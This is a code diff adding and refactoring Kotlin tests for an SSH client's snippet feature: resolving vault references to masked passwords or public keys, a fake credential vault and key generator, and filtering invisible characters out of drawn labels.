     private fun store(id: String, edit: (CredentialUsage) -> CredentialUsage): CredentialUsage =
         edit(entries[id] ?: CredentialUsage(id)).also { entries[id] = it }
-}
-
-/** In-memory [Vault] storing records (put/openPayload/records/remove, tombstone) for tests. */
-private class FakeCredVault : Vault {
-    private val payloads = mutableMapOf<String, ByteArray>()
-    private val records = mutableMapOf<String, VaultRecord>()
-
-    override fun exists(): Boolean = true
-    override val isUnlocked: Boolean = true
-    override fun create(password: CharArray) = Unit
-    override fun unlock(password: CharArray): UnlockResult = UnlockResult.Success
-    override fun lock() = Unit
-    override fun reset() { payloads.clear(); records.clear() }
-
-    override fun records(): List<VaultRecord> = records.values.toList()
-    override fun syncMeta(): SyncMeta? = null
-    override fun mergeRemote(remote: List<VaultRecord>): MergeResult = MergeResult.EMPTY
-    override fun openPayload(id: String): ByteArray? =
-        records[id]?.takeIf { !it.deleted }?.let { payloads[id] }
-
-    override fun put(id: String, type: RecordType, payload: ByteArray) {
-        val version = (records[id]?.version ?: 0L) + 1
-        records[id] = VaultRecord(id, type, version, "2026-06-12T00:00:00Z", "dev", deleted = false, blob = ByteArray(0))
-        payloads[id] = payload
-    }
-
-    override fun remove(id: String) {
-        records[id] = (records[id] ?: return).copy(version = records[id]!!.version + 1, deleted = true)
-    }
-
-    override fun changePassword(oldPassword: CharArray, newPassword: CharArray): Boolean = true
-    override fun verifyPassword(password: CharArray): Boolean = true
-
-    override fun unlockWithDataKey(dataKey: DataKey): UnlockResult = UnlockResult.Corrupted
-    override fun exportDataKey(): DataKey? = null
-    override fun adoptDataKey(newDataKey: DataKey, password: CharArray): Boolean = false
 }

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/identity/FakeCredVault.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/identity/FakeCredVault.kt
@@ -1,0 +1,51 @@
+package app.skerry.ui.identity
+
+import app.skerry.shared.vault.DataKey
+import app.skerry.shared.vault.MergeResult
+import app.skerry.shared.vault.RecordType
+import app.skerry.shared.vault.SyncMeta
+import app.skerry.shared.vault.UnlockResult
+import app.skerry.shared.vault.Vault
+import app.skerry.shared.vault.VaultRecord
+
+/**
+ * In-memory unlocked vault: records and payloads in two maps, versions bumped on every put, deletes
+ * left as tombstones. Enough for anything that drives a real [app.skerry.shared.vault.CredentialStore]
+ * without a file or a crypto provider — the keychain controller's tests and the snippet
+ * confirmation's, which needs a keychain to resolve a `${'$'}{{vault:name}}` reference against.
+ */
+internal class FakeCredVault : Vault {
+    private val payloads = mutableMapOf<String, ByteArray>()
+    private val records = mutableMapOf<String, VaultRecord>()
+
+    override fun exists(): Boolean = true
+    override val isUnlocked: Boolean = true
+    override fun create(password: CharArray) = Unit
+    override fun unlock(password: CharArray): UnlockResult = UnlockResult.Success
+    override fun lock() = Unit
+    override fun reset() { payloads.clear(); records.clear() }
+
+    override fun records(): List<VaultRecord> = records.values.toList()
+    override fun syncMeta(): SyncMeta? = null
+    override fun mergeRemote(remote: List<VaultRecord>): MergeResult = MergeResult.EMPTY
+    override fun openPayload(id: String): ByteArray? =
+        records[id]?.takeIf { !it.deleted }?.let { payloads[id] }
+
+    override fun put(id: String, type: RecordType, payload: ByteArray) {
+        val version = (records[id]?.version ?: 0L) + 1
+        records[id] = VaultRecord(id, type, version, "2026-06-12T00:00:00Z", "dev", deleted = false, blob = ByteArray(0))
+        payloads[id] = payload
+    }
+
+    override fun remove(id: String) {
+        val record = records[id] ?: return
+        records[id] = record.copy(version = record.version + 1, deleted = true)
+    }
+
+    override fun changePassword(oldPassword: CharArray, newPassword: CharArray): Boolean = true
+    override fun verifyPassword(password: CharArray): Boolean = true
+
+    override fun unlockWithDataKey(dataKey: DataKey): UnlockResult = UnlockResult.Corrupted
+    override fun exportDataKey(): DataKey? = null
+    override fun adoptDataKey(newDataKey: DataKey, password: CharArray): Boolean = false
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/FakeSshKeyGenerator.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/FakeSshKeyGenerator.kt
@@ -1,0 +1,23 @@
+package app.skerry.ui.snippet
+
+import app.skerry.shared.vault.GeneratedSshKey
+import app.skerry.shared.vault.SshKeyGenerator
+import app.skerry.shared.vault.SshKeyType
+import app.skerry.shared.vault.SshPublicKeyInfo
+
+/** The public line [FakeSshKeyGenerator] derives, so a test can assert on what was spliced. */
+internal const val FAKE_PUBLIC_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI temp"
+
+/**
+ * Stands in for the platform key parser: [inspect] answers [answer] without touching a PEM, so a test
+ * can drive the derived-public-key path (and its failures — a null answer, a blank line, a throw)
+ * without a crypto provider. [generate] is not part of any of that and refuses.
+ */
+internal class FakeSshKeyGenerator(
+    private val answer: () -> SshPublicKeyInfo? = { SshPublicKeyInfo(FAKE_PUBLIC_KEY, "SHA256:x", "ED25519") },
+) : SshKeyGenerator {
+    override fun generate(type: SshKeyType, comment: String): GeneratedSshKey =
+        throw UnsupportedOperationException("the tests that use this fake never generate")
+
+    override fun inspect(privateKeyPem: String, passphrase: String?): SshPublicKeyInfo? = answer()
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/TemplateVariableValuesTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/TemplateVariableValuesTest.kt
@@ -1,9 +1,14 @@
 package app.skerry.ui.snippet
 
 import androidx.compose.runtime.mutableStateMapOf
+import app.skerry.shared.snippet.SnippetSegment
+import app.skerry.shared.snippet.SnippetVariableKind
 import kotlin.test.Test
+import kotlin.test.assertEquals
 import kotlin.test.assertFalse
 import kotlin.test.assertTrue
+
+private const val PUBLIC_LINE = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI temp"
 
 class TemplateVariableValuesTest {
 
@@ -12,9 +17,19 @@ class TemplateVariableValuesTest {
         paramChoices = emptyMap(),
         vaultRefs = emptyList(),
         needsClipboard = false,
-        vaultResolutions = emptyMap(),
         params = mutableStateMapOf<String, String>().apply { putAll(params) },
     )
+
+    private fun vaultValues(vararg refs: String) = TemplateVariableValues(
+        paramNames = emptyList(),
+        paramChoices = emptyMap(),
+        vaultRefs = refs.toList(),
+        needsClipboard = false,
+        params = mutableStateMapOf(),
+    )
+
+    private fun vaultVariable(name: String) =
+        SnippetSegment.Variable(SnippetVariableKind.VAULT, "vault", name, "\${{vault:$name}}")
 
     @Test
     fun a_parameter_is_seeded_until_it_is_edited() {
@@ -40,5 +55,61 @@ class TemplateVariableValuesTest {
         assertTrue(v.isSeeded("port"))
         v.params["port"] = "8080"
         assertFalse(v.isSeeded("port"))
+    }
+
+    @Test
+    fun a_vault_reference_blocks_the_run_until_it_is_resolved() {
+        val v = vaultValues("temp_pubkey")
+        // Deriving a public half parses a PEM off the composition thread: until it lands, the dialog
+        // has no value to send, and "not answered yet" must not read as "resolved".
+        assertFalse(v.canRun)
+
+        v.vaultResolutions = mapOf("temp_pubkey" to VaultRef.Ok(PUBLIC_LINE, secret = false))
+
+        assertTrue(v.canRun)
+    }
+
+    @Test
+    fun a_missing_or_unusable_entry_keeps_the_run_blocked() {
+        val v = vaultValues("gone", "on-disk")
+        v.vaultResolutions = mapOf("gone" to VaultRef.Missing, "on-disk" to VaultRef.Unusable)
+
+        assertFalse(v.canRun)
+    }
+
+    @Test
+    fun a_password_is_masked_in_the_preview_and_sent_in_clear() {
+        val v = vaultValues("prod-db")
+        v.vaultResolutions = mapOf("prod-db" to VaultRef.Ok("s3cret", secret = true))
+        val variable = vaultVariable("prod-db")
+
+        assertEquals(SECRET_MASK, v.value(variable, masked = true))
+        assertEquals("s3cret", v.value(variable, masked = false))
+        // The guard's later confirmation masks the same span this preview did.
+        assertEquals(listOf("s3cret"), v.vaultSecrets())
+    }
+
+    @Test
+    fun the_masked_span_is_the_one_that_reaches_the_line() {
+        val v = vaultValues("prod-db")
+        // A password may hold anything the vault accepted. The line is assembled through
+        // sanitizeSnippetValue, so a tab arrives as a space — and the guard's exact replace would
+        // walk straight past the raw string and print the password in its quote.
+        v.vaultResolutions = mapOf("prod-db" to VaultRef.Ok("pass\tword", secret = true))
+
+        assertEquals(listOf("pass word"), v.vaultSecrets())
+    }
+
+    @Test
+    fun a_public_key_reads_the_same_in_the_preview_and_is_not_a_secret_to_mask() {
+        val v = vaultValues("temp_pubkey")
+        v.vaultResolutions = mapOf("temp_pubkey" to VaultRef.Ok(PUBLIC_LINE, secret = false))
+        val variable = vaultVariable("temp_pubkey")
+
+        assertEquals(PUBLIC_LINE, v.value(variable, masked = true))
+        assertEquals(PUBLIC_LINE, v.value(variable, masked = false))
+        // Public material must not travel to the production guard as a span to hide: masking it would
+        // blank out the one part of the quoted line that says which key is being authorized.
+        assertEquals(emptyList(), v.vaultSecrets())
     }
 }

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/VaultRefResolveTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/VaultRefResolveTest.kt
@@ -1,0 +1,92 @@
+package app.skerry.ui.snippet
+
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+import app.skerry.shared.vault.SshPublicKeyInfo
+import kotlin.test.Test
+import kotlin.test.assertEquals
+
+/**
+ * The glue between the keychain and a `${'$'}{{vault:name}}` reference: which entry is found, and what
+ * the platform key parser is allowed to fail at. [app.skerry.shared.snippet.snippetVaultValue] owns
+ * the decision itself; what is tested here is the look-up and the failure containment around it.
+ */
+class VaultRefResolveTest {
+
+    private val working = FakeSshKeyGenerator()
+
+    private val entries = listOf(
+        Credential("c-1", "prod-db", CredentialSecret.Password("s3cret")),
+        Credential("c-2", "temp_pubkey", CredentialSecret.PrivateKey("pem", passphrase = "pp")),
+        Credential("c-3", "on-disk", CredentialSecret.KeyFile("~/.ssh/id_ed25519")),
+    )
+
+    @Test
+    fun `a password entry resolves to a masked secret`() {
+        assertEquals(VaultRef.Ok("s3cret", secret = true), resolveVaultRef("prod-db", entries, working))
+    }
+
+    @Test
+    fun `a key entry resolves to its public half, shown in clear`() {
+        assertEquals(VaultRef.Ok(FAKE_PUBLIC_KEY, secret = false), resolveVaultRef("temp_pubkey", entries, working))
+    }
+
+    @Test
+    fun `a name no entry carries is missing, not unusable`() {
+        // The two say different things to the user: "no such entry" is a typo in the template,
+        // "nothing to insert" is an entry that cannot serve the reference.
+        assertEquals(VaultRef.Missing, resolveVaultRef("ghost", entries, working))
+    }
+
+    @Test
+    fun `a file-backed entry has nothing to insert`() {
+        assertEquals(VaultRef.Unusable, resolveVaultRef("on-disk", entries, working))
+    }
+
+    @Test
+    fun `without a key generator a key reference is unusable rather than empty`() {
+        assertEquals(VaultRef.Unusable, resolveVaultRef("temp_pubkey", entries, generator = null))
+    }
+
+    @Test
+    fun `a key parser that throws leaves the reference unusable instead of killing the dialog`() {
+        // inspect() is contracted to answer null on a key it cannot read, but it runs a platform
+        // BER/DER parser over stored bytes: a violation of that contract must fail this one
+        // reference, not the confirmation the user is standing in.
+        val exploding = FakeSshKeyGenerator { error("bad key material") }
+
+        assertEquals(VaultRef.Unusable, resolveVaultRef("temp_pubkey", entries, exploding))
+    }
+
+    @Test
+    fun `a name two entries answer to resolves to nothing at all`() {
+        val twins = entries + Credential("c-4", "prod-db", CredentialSecret.PrivateKey("pem"))
+
+        // Nothing stops two secrets sharing a label. Taking the first would splice a password into
+        // one run and a public key into the next, in whatever order the store happened to list them.
+        assertEquals(VaultRef.Ambiguous, resolveVaultRef("prod-db", twins, working))
+        assertEquals(false, vaultRefNeedsKeyParse("prod-db", twins))
+    }
+
+    @Test
+    fun `only a key reference needs the parser, so the rest resolve on the spot`() {
+        assertEquals(true, vaultRefNeedsKeyParse("temp_pubkey", entries))
+        assertEquals(false, vaultRefNeedsKeyParse("prod-db", entries))
+        assertEquals(false, vaultRefNeedsKeyParse("on-disk", entries))
+        assertEquals(false, vaultRefNeedsKeyParse("ghost", entries))
+    }
+
+    @Test
+    fun `a resolved password does not print itself`() {
+        assertEquals("Ok(redacted)", VaultRef.Ok("s3cret", secret = true).toString())
+        assertEquals("Ok($FAKE_PUBLIC_KEY)", VaultRef.Ok(FAKE_PUBLIC_KEY, secret = false).toString())
+    }
+
+    @Test
+    fun `a key whose public half comes back blank is unusable`() {
+        val blank = FakeSshKeyGenerator { SshPublicKeyInfo("   ", "SHA256:x", "ED25519") }
+
+        // Splicing an empty string would run the command with the key silently missing.
+        assertEquals(VaultRef.Unusable, resolveVaultRef("temp_pubkey", entries, blank))
+    }
+}

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/desktop/ShellHarness.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/desktop/ShellHarness.kt
@@ -20,7 +20,11 @@ import androidx.compose.ui.platform.LocalDensity
 import androidx.compose.ui.platform.LocalWindowInfo
 import androidx.compose.ui.platform.WindowInfo
 import androidx.compose.ui.unit.Density
+import androidx.compose.ui.semantics.SemanticsNode
+import androidx.compose.ui.semantics.SemanticsProperties
+import androidx.compose.ui.semantics.getOrNull
 import androidx.compose.ui.test.ComposeUiTest
+import androidx.compose.ui.test.onRoot
 import androidx.compose.ui.test.ExperimentalTestApi
 import androidx.compose.ui.test.SemanticsNodeInteraction
 import androidx.compose.ui.test.assertIsEnabled
@@ -60,7 +64,9 @@ import kotlinx.coroutines.cancel
 import app.skerry.ui.theme.SkerryTheme
 import app.skerry.shared.vault.BouncyCastleSshKeyGenerator
 import kotlinx.coroutines.runBlocking
+import org.jetbrains.compose.resources.PluralStringResource
 import org.jetbrains.compose.resources.StringResource
+import org.jetbrains.compose.resources.getPluralString
 import org.jetbrains.compose.resources.getString
 
 /**
@@ -432,6 +438,29 @@ internal fun string(resource: StringResource): String = runBlocking { getString(
 
 /** Same, for a string with placeholders — a control named after the thing it acts on. */
 internal fun string(resource: StringResource, vararg args: Any): String = runBlocking { getString(resource, *args) }
+
+/**
+ * How long a wait on work that left the composition may take. `waitUntil`'s own default is a second,
+ * and a hop through [kotlinx.coroutines.Dispatchers.Default] can miss that on a CI runner whose cores
+ * are already carrying other Gradle workers — a timeout there fails a correct build.
+ */
+internal const val CROSS_THREAD_TIMEOUT_MS = 5_000L
+
+/**
+ * Every string the tree draws, in order. Unmerged: a text node absorbed into a clickable ancestor's
+ * merged description is still text on the screen, and a filter test has to see it as drawn.
+ */
+@OptIn(ExperimentalTestApi::class)
+internal fun ComposeUiTest.drawnText(): List<String> =
+    onRoot(useUnmergedTree = true).fetchSemanticsNode().allText()
+
+/** [drawnText] for a subtree — the shape a test needs when there is more than one root. */
+internal fun SemanticsNode.allText(): List<String> =
+    config.getOrNull(SemanticsProperties.Text).orEmpty().map { it.text } + children.flatMap { it.allText() }
+
+/** Same, for a counted string: the test asserts the wording the reader gets, not the plural rule. */
+internal fun string(resource: PluralStringResource, quantity: Int, vararg args: Any): String =
+    runBlocking { getPluralString(resource, quantity, *args) }
 
 private val PHONE_WIDTH = 390.dp
 private val PHONE_HEIGHT = 844.dp

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookRunPanelTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookRunPanelTest.kt
@@ -9,6 +9,7 @@ import app.skerry.shared.runbook.Runbook
 import app.skerry.shared.runbook.RunbookStep
 import app.skerry.shared.snippet.SnippetMoment
 import app.skerry.shared.snippet.SnippetRunEnvironment
+import app.skerry.ui.desktop.drawnText
 import app.skerry.ui.desktop.runForm
 import app.skerry.ui.desktop.string
 import app.skerry.ui.generated.resources.Res
@@ -25,10 +26,6 @@ import kotlinx.coroutines.SupervisorJob
 import kotlinx.coroutines.cancel
 import kotlin.test.Test
 import kotlin.test.assertEquals
-import androidx.compose.ui.semantics.SemanticsNode
-import androidx.compose.ui.semantics.SemanticsProperties
-import androidx.compose.ui.semantics.getOrNull
-import androidx.compose.ui.test.onRoot
 import kotlin.test.assertTrue
 
 /**
@@ -85,7 +82,7 @@ class RunbookRunPanelTest {
             runner.requestStart(runbook, target())
             runner.confirmStart { "" }
             runForm({ runner.run?.let { RunbookRunPanel(runner, it) } }) {
-                val drawn = onRoot(useUnmergedTree = true).fetchSemanticsNode().allText()
+                val drawn = drawnText()
                 assertTrue(drawn.isNotEmpty(), "the panel drew nothing")
                 assertTrue(
                     drawn.none { text -> text.codePoints().anyMatch { Character.getType(it) == Character.FORMAT.toInt() } },
@@ -103,9 +100,6 @@ class RunbookRunPanelTest {
             scope.cancel()
         }
     }
-
-    private fun SemanticsNode.allText(): List<String> =
-        config.getOrNull(SemanticsProperties.Text).orEmpty().map { it.text } + children.flatMap { it.allText() }
 
     @Test
     fun `the panel completes and skips an interactive step`() {

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/SnippetSecretNoticeTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/SnippetSecretNoticeTest.kt
@@ -1,0 +1,77 @@
+package app.skerry.ui.snippet
+
+import androidx.compose.runtime.CompositionLocalProvider
+import androidx.compose.ui.test.ExperimentalTestApi
+import androidx.compose.ui.test.assertIsEnabled
+import androidx.compose.ui.test.hasText
+import androidx.compose.ui.test.onNodeWithTag
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+import app.skerry.shared.vault.CredentialStore
+import app.skerry.ui.app.LocalCredentials
+import app.skerry.ui.app.UiTags
+import app.skerry.ui.app.LocalSshKeyGenerator
+import app.skerry.ui.desktop.CROSS_THREAD_TIMEOUT_MS
+import app.skerry.ui.desktop.runForm
+import app.skerry.ui.desktop.seededSnippets
+import app.skerry.ui.desktop.string
+import app.skerry.ui.generated.resources.Res
+import app.skerry.ui.generated.resources.lib_snippet_vars_secret_note
+import app.skerry.ui.identity.CredentialManagerController
+import app.skerry.ui.identity.FakeCredVault
+import kotlin.test.Test
+import kotlin.test.assertFalse
+import kotlin.test.assertTrue
+
+/**
+ * "Secrets are inserted as plain text" is a warning about what the run puts on the wire. A command
+ * whose only vault reference is a key carries the key's public half — a warning there is false, and
+ * a warning that cries wolf is the one nobody reads before the run that does carry a password.
+ */
+@OptIn(ExperimentalTestApi::class)
+class SnippetSecretNoticeTest {
+
+    /** Whether the plaintext warning is drawn for a snippet referencing [entry]. */
+    private fun noticeShownFor(entry: Credential, reference: String): Boolean {
+        val store = CredentialStore(FakeCredVault()).apply { put(entry) }
+        val credentials = CredentialManagerController(store) { "gen" }.apply { reload() }
+        val manager = seededSnippets()
+        val id = manager.save(SnippetDraft(label = "grant", command = "echo \${{vault:$reference}}"))
+        manager.run(id) { _, _ -> }
+
+        var shown = false
+        runForm({
+            CompositionLocalProvider(
+                LocalCredentials provides credentials,
+                LocalSshKeyGenerator provides FakeSshKeyGenerator(),
+            ) {
+                SnippetRunDialog(manager)
+            }
+        }) {
+            // A key reference resolves through Dispatchers.Default, which the composition's idle check
+            // cannot see, and Run stays disabled until every reference has answered. Asserting the
+            // notice's *absence* straight after waitForIdle would pass on an unresolved dialog —
+            // which is exactly the state this test must not accept as evidence.
+            waitUntil("the run is resolved enough to send", timeoutMillis = CROSS_THREAD_TIMEOUT_MS) {
+                runCatching { onNodeWithTag(UiTags.FORM_SAVE).assertIsEnabled() }.isSuccess
+            }
+            shown = onAllNodes(hasText(string(Res.string.lib_snippet_vars_secret_note)))
+                .fetchSemanticsNodes().isNotEmpty()
+        }
+        return shown
+    }
+
+    @Test
+    fun `a run carrying a password is warned about it`() {
+        val password = Credential("c-1", "prod-db", CredentialSecret.Password("s3cret"))
+
+        assertTrue(noticeShownFor(password, "prod-db"))
+    }
+
+    @Test
+    fun `a run carrying only a public key is not`() {
+        val key = Credential("c-1", "temp_pubkey", CredentialSecret.PrivateKey("pem"))
+
+        assertFalse(noticeShownFor(key, "temp_pubkey"))
+    }
+}

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/TemplateVariableResolutionTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/TemplateVariableResolutionTest.kt
@@ -1,0 +1,134 @@
+package app.skerry.ui.snippet
+
+import androidx.compose.runtime.CompositionLocalProvider
+import androidx.compose.ui.test.ExperimentalTestApi
+import app.skerry.shared.snippet.SnippetSegment
+import app.skerry.shared.snippet.SnippetVariableKind
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+import app.skerry.shared.vault.CredentialStore
+import app.skerry.ui.app.LocalCredentials
+import app.skerry.ui.app.LocalSshKeyGenerator
+import app.skerry.ui.desktop.CROSS_THREAD_TIMEOUT_MS
+import app.skerry.ui.desktop.runForm
+import app.skerry.ui.identity.CredentialDraft
+import app.skerry.ui.identity.CredentialKind
+import app.skerry.ui.identity.CredentialManagerController
+import app.skerry.ui.identity.FakeCredVault
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertFalse
+import kotlin.test.assertTrue
+
+/**
+ * The confirmation actually resolving its `${'$'}{{vault:…}}` references against the keychain. The
+ * pieces are unit-tested elsewhere; what this covers is the wiring — without it a snippet holding a
+ * key reference would open with Run disabled forever and a row that never leaves "reading", and
+ * every other test in the suite would still pass.
+ */
+@OptIn(ExperimentalTestApi::class)
+class TemplateVariableResolutionTest {
+
+    private fun keychain(vararg secrets: Credential): CredentialManagerController {
+        val store = CredentialStore(FakeCredVault())
+        secrets.forEach { store.put(it) }
+        return CredentialManagerController(store) { "gen" }.apply { reload() }
+    }
+
+    private fun reference(name: String) =
+        SnippetSegment.Variable(SnippetVariableKind.VAULT, "vault", name, "\${{vault:$name}}")
+
+    /**
+     * Drives one confirmation's worth of resolution and hands back the settled values. Waits on the
+     * map, not on `waitForIdle`: a key parse runs on [kotlinx.coroutines.Dispatchers.Default], which
+     * the composition's idle check cannot see, and asserting straight after it is the frame race
+     * this suite already swept once.
+     */
+    private fun resolve(
+        credentials: CredentialManagerController,
+        vararg names: String,
+    ): TemplateVariableValues {
+        lateinit var values: TemplateVariableValues
+        runForm({
+            CompositionLocalProvider(
+                LocalCredentials provides credentials,
+                LocalSshKeyGenerator provides FakeSshKeyGenerator(),
+            ) {
+                values = rememberTemplateVariableValues("request", names.map { reference(it) })
+            }
+        }) {
+            waitUntil("every vault reference answered", timeoutMillis = CROSS_THREAD_TIMEOUT_MS) { values.vaultResolutions.size == names.size }
+        }
+        return values
+    }
+
+    @Test
+    fun `a key reference resolves to the public half and unblocks the run`() {
+        val credentials = keychain(Credential("c-1", "temp_pubkey", CredentialSecret.PrivateKey("pem", "pp")))
+
+        val values = resolve(credentials, "temp_pubkey")
+
+        assertTrue(values.canRun, "the confirmation never left its pending state")
+        assertEquals(FAKE_PUBLIC_KEY, values.value(reference("temp_pubkey"), masked = false))
+        // Public material: nothing for the production guard to mask further down the line.
+        assertEquals(emptyList(), values.vaultSecrets())
+    }
+
+    @Test
+    fun `a password reference resolves without the key parser and is masked`() {
+        val credentials = keychain(Credential("c-1", "prod-db", CredentialSecret.Password("s3cret")))
+
+        val values = resolve(credentials, "prod-db")
+
+        assertTrue(values.canRun)
+        assertEquals(SECRET_MASK, values.value(reference("prod-db"), masked = true))
+        assertEquals(listOf("s3cret"), values.vaultSecrets())
+    }
+
+    @Test
+    fun `a password and a key in one command both survive the async half`() {
+        val credentials = keychain(
+            Credential("c-1", "prod-db", CredentialSecret.Password("s3cret")),
+            Credential("c-2", "temp_pubkey", CredentialSecret.PrivateKey("pem")),
+        )
+
+        val values = resolve(credentials, "prod-db", "temp_pubkey")
+
+        // The password is resolved on the spot and the key lands later: the late write merges into
+        // the map rather than replacing it, or the password would vanish as the key arrives.
+        assertTrue(values.canRun)
+        assertEquals("s3cret", values.value(reference("prod-db"), masked = false))
+        assertEquals(FAKE_PUBLIC_KEY, values.value(reference("temp_pubkey"), masked = false))
+    }
+
+    @Test
+    fun `a secret landing mid-dialog does not change what the preview already means`() {
+        val credentials = keychain(Credential("c-1", "prod-db", CredentialSecret.Password("s3cret")))
+        lateinit var values: TemplateVariableValues
+        runForm({
+            CompositionLocalProvider(
+                LocalCredentials provides credentials,
+                LocalSshKeyGenerator provides FakeSshKeyGenerator(),
+            ) {
+                values = rememberTemplateVariableValues("request", listOf(reference("prod-db")))
+            }
+        }) {
+            waitUntil("the reference answered", timeoutMillis = CROSS_THREAD_TIMEOUT_MS) { values.vaultResolutions.isNotEmpty() }
+
+            // Background sync rotating the secret while the confirmation is open: the keychain is
+            // read once when it opens, so the line the user is reading stays the line that is sent.
+            credentials.save(CredentialDraft(id = "c-1", label = "prod-db", kind = CredentialKind.PASSWORD, password = "rotated"))
+            waitForIdle()
+
+            assertEquals("s3cret", values.value(reference("prod-db"), masked = false))
+        }
+    }
+
+    @Test
+    fun `a reference to nothing keeps the run blocked`() {
+        val values = resolve(keychain(), "ghost")
+
+        assertFalse(values.canRun)
+        assertEquals("", values.value(reference("ghost"), masked = false))
+    }
+}

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/TemplateVariableVaultLabelTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/TemplateVariableVaultLabelTest.kt
@@ -1,20 +1,17 @@
 package app.skerry.ui.snippet
 
 import androidx.compose.runtime.mutableStateMapOf
-import androidx.compose.ui.semantics.SemanticsNode
-import androidx.compose.ui.semantics.SemanticsProperties
-import androidx.compose.ui.semantics.getOrNull
-import androidx.compose.ui.test.ComposeUiTest
 import androidx.compose.ui.test.ExperimentalTestApi
 import androidx.compose.ui.test.onNodeWithContentDescription
-import androidx.compose.ui.test.onRoot
 import androidx.compose.ui.text.font.FontFamily
 import app.skerry.shared.snippet.Snippet
 import app.skerry.ui.design.MAX_UNTRUSTED_LABEL_CHARS
 import app.skerry.ui.design.untrustedLabel
+import app.skerry.ui.desktop.drawnText
 import app.skerry.ui.desktop.runForm
 import app.skerry.ui.desktop.string
 import app.skerry.ui.generated.resources.Res
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_ambiguous
 import app.skerry.ui.generated.resources.lib_snippet_vars_vault_unnamed
 import kotlin.test.Test
 import kotlin.test.assertEquals
@@ -32,7 +29,10 @@ class TemplateVariableVaultLabelTest {
     // Escapes, not the raw glyphs: an invisible character in source is unreviewable.
     private val reordered = "prod\u202Edb"
     private val invisible = "stag\u200Bing"
-    private val notPassword = "web\u202D1"
+    private val unusable = "web\u202D1"
+
+    /** Two entries answer to this one — the row must say so rather than name a secret. */
+    private val ambiguous = "twins"
 
     /** Nothing of this name survives the filter — the row still has to name something. */
     private val unprintable = "\u3164\u200B"
@@ -42,18 +42,20 @@ class TemplateVariableVaultLabelTest {
         val values = TemplateVariableValues(
             paramNames = emptyList(),
             paramChoices = emptyMap(),
-            vaultRefs = listOf(reordered, invisible, notPassword, unprintable),
+            vaultRefs = listOf(reordered, invisible, unusable, ambiguous, unprintable),
             needsClipboard = false,
+            params = mutableStateMapOf(),
+        ).apply {
             // All three draw sites: the resolved row and the two error sentences the name is
             // spliced into.
             vaultResolutions = mapOf(
-                reordered to VaultRef.Ok("s3cret"),
+                reordered to VaultRef.Ok("s3cret", secret = true),
                 invisible to VaultRef.Missing,
-                notPassword to VaultRef.NotAPassword,
-                unprintable to VaultRef.Ok("s3cret"),
-            ),
-            params = mutableStateMapOf(),
-        )
+                unusable to VaultRef.Unusable,
+                ambiguous to VaultRef.Ambiguous,
+                unprintable to VaultRef.Ok("s3cret", secret = true),
+            )
+        }
         runForm({ TemplateVariableFields(values, autoFocus = false) }) {
             val drawn = drawnText()
             assertTrue(drawn.any { it.contains("proddb") }, "the resolved entry is still named, was $drawn")
@@ -61,6 +63,10 @@ class TemplateVariableVaultLabelTest {
             // only what is drawn was filtered.
             assertEquals(2, drawn.count { it == SECRET_MASK }, "both resolved rows still draw, was $drawn")
             assertTrue(drawn.none { it.hasFormatChars() }, "no formatting character reaches the screen, was $drawn")
+            assertTrue(
+                drawn.any { it == string(Res.string.lib_snippet_vars_vault_ambiguous, ambiguous) },
+                "a name two entries answer to says so, was $drawn",
+            )
             assertTrue(
                 drawn.any { it.contains(string(Res.string.lib_snippet_vars_vault_unnamed)) },
                 "a name that filters away to nothing still names its row, was $drawn",
@@ -81,7 +87,6 @@ class TemplateVariableVaultLabelTest {
             paramChoices = emptyMap(),
             vaultRefs = emptyList(),
             needsClipboard = false,
-            vaultResolutions = emptyMap(),
             params = mutableStateMapOf(),
         )
         runForm({ TemplateVariableFields(values, autoFocus = false) }) {
@@ -133,10 +138,6 @@ class TemplateVariableVaultLabelTest {
         }
     }
 
-    private fun ComposeUiTest.drawnText(): List<String> = onRoot(useUnmergedTree = true).fetchSemanticsNode().allText()
-
     private fun String.hasFormatChars(): Boolean = any { it.category == CharCategory.FORMAT }
 
-    private fun SemanticsNode.allText(): List<String> =
-        config.getOrNull(SemanticsProperties.Text).orEmpty().map { it.text } + children.flatMap { it.allText() }
 }

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/UntrustedSnippetTextTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/UntrustedSnippetTextTest.kt
@@ -17,6 +17,8 @@ import app.skerry.shared.snippet.SnippetMoment
 import app.skerry.shared.snippet.SnippetRunEnvironment
 import app.skerry.ui.design.boundedVisibleText
 import app.skerry.ui.design.untrustedLabel
+import app.skerry.ui.desktop.drawnText
+import app.skerry.ui.desktop.allText
 import app.skerry.ui.desktop.runForm
 import app.skerry.ui.desktop.seededSnippets
 import app.skerry.ui.mobile.MobileSnippetCard
@@ -139,7 +141,7 @@ class UntrustedSnippetTextTest {
         manager.save(SnippetDraft(label = "Beep", command = "echo ok\u0007 \${{host}}"))
         manager.run(manager.snippets.first().id) { _, _ -> }
